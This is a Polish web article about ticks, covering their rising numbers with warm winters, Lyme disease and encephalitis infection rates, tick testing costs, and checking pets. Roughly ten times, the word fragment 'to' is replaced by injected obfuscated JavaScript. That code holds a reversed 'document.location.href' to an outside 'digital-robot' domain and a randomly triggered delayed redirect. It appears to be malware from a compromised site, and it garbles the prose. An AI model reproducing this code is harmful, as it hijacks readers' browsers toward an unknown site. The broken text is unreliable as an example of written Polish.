Gdy kleszcz zaatakuje

 

Liczba kleszczy powiększa się z roku na rok w zastraszającym tempie. Jeszcze kilkanaście lat temu, gdy klimat w Polsce był bardziej zróżnicowany; zimy długie i mroźne, a latobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to nie trwało większość roku, kleszcze nie miały odpowiednich warunków do licznego rozmnażania się. Obecnie właśnie przez zmianę klimatu i ciepłe zimy, są one w stanie przetrwać przez cały rok; wystarczy jedynie dziesięć stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}topni na plusie, by przeżyć.

Czy kontakt z kleszczami jest niebezpieczny?

badanie kleszczyChoć zdecydowanie lepszym celem dla kleszcza jest organizm zwierzęcia, ludzie są coraz częściej atakowani przez tego pajęczaka. Gdzie można go spotkać? Praktycznie wszędzie, gdzie rosną bujne miejsca zielone i wilgotne lasy oraz przy zbiornikach wodnych. Kleszcze doskonale radzą sobie również w miejskiej, betobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tonowej dżungli, dlatego atak na człowieka nie jest już trudnością. Szacuje się, że zarażonych boreliozą kleszczy jest od 15 do 30 procent, a kleszczowym zapaleniem mózgu jeszcze mniej, bo do 15 procent. To stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tosunkowo niewiele, jak mówią naukowcy. Przestrzegają, by nie bać się obcować z naturą z obawą przez ukąszeniem kleszcza. Gdy dojdzie do wkłucia się kleszcza, należy go jak najszybciej wyciągnąć z ciała. Lekarze radzą, by wykonać na nim badania genetyczne pod kątem obecności patobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}togenu. Szybkie badanie kleszczy tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to wydatek od dwustu do nawet trzystu złotych, dlatego nie każdy się na tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to decyduje. Dodatkowo, ich obecność w organizmie kleszcza wcale nie musi oznaczać, że ukąszony zaraził się nim.

Choć skontrolowanie wbitego w skórę kleszcza na ludzkim ciele jest dosyć łatwe, tak jeżeli chodzi o domowe zwierzęta, sprawa jest bardziej skomplikowana. U ludzi najczęściej spotyka się je w zgięciach kończyn i za uszami. U psów czy kotów sierść jest dodatkowym utrudnieniem. Wartobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to zaopatrzyć się w obroże przeciw kleszczowe z legalnego źródła.